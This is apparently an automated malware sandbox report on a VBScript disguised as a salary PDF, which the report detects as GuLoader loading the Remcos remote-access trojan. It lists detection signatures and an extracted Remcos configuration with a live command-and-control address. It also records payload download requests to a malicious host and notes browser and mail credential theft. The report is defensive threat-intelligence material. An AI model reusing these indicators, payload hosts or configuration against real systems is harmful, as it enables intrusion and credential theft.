Windows Analysis Report
Salary Revision_pdf.vbs

Overview

General Information

Sample name: Salary Revision_pdf.vbs
Analysis ID: 1538691
MD5: 28dbf118827e6bf0607e4b736ae51611
SHA1: a0842630151f9633e4283d29dbd737cf1ca372e1
SHA256: aeae4edd76aaab5a1e861d14b5fbc5736fac6b569f74d004224786fcc129099c
Tags: vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Found malware configuration
Source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.214:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-AOD6MB", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Multi AV Scanner detection for submitted file
Source: Salary Revision_pdf.vbs ReversingLabs: Detection: 13%
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1789395704.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1794834072.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2634385047.000000000501A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1779780238.000000000501B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8140, type: MEMORYSTR
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49930 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1637195965.0000000003126000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdbo source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbi source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_209010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_209010F1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20906580 FindFirstFileExA, 7_2_20906580
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW, 11_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407898

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49960 -> 154.216.18.214:2404
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49971 -> 154.216.18.214:2404
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 154.216.18.214
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49960 -> 154.216.18.214:2404
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49972 -> 178.237.33.50:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49930 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /zWAbmrmP/Diwani.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.18.214
Source: global traffic HTTP traffic detected: GET /zWAbmrmP/Diwani.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sf4l.shopCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: msiexec.exe, 0000000B.00000003.1810983251.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000B.00000003.1810983251.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000B.00000002.1811966044.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: msiexec.exe, 00000007.00000002.2647088933.00000000208D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 00000007.00000002.2647383067.0000000021140000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: sf4l.shop
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv528A.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv528A.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv528A.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: wscript.exe, 00000000.00000002.1356231389.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333582119.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355352075.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343793550.0000023D9788D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356231389.0000023D97822000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355352075.0000023D9781D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D9783E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1355418070.0000023D977D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354833341.0000023D977CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enG=Def
Source: wscript.exe, 00000000.00000003.1343793550.0000023D9784B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e936f3372f
Source: msiexec.exe, 00000007.00000003.1853013269.000000000501A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1854570981.0000000005066000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1794345263.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634426863.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1779759485.000000000506C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2634220952.0000000005009000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1789210479.000000000506F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1854784125.000000000506F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpl
Source: msiexec.exe, 00000007.00000002.2634220952.0000000004FEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpp
Source: powershell.exe, 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1661877856.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv528A.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1333343530.0000023D97847000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1333608646.0000023D97814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv528A.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv528A.tmp.11.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: wscript.exe, 00000000.00000002.1356162762.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354541733.0000023D977E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1332866074.0000023D97AB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355218122.0000023D977EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv528A.tmp.11.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E66A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sf4l.shop
Source: powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv528A.tmp.11.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv528A.tmp.11.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.1800854936.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
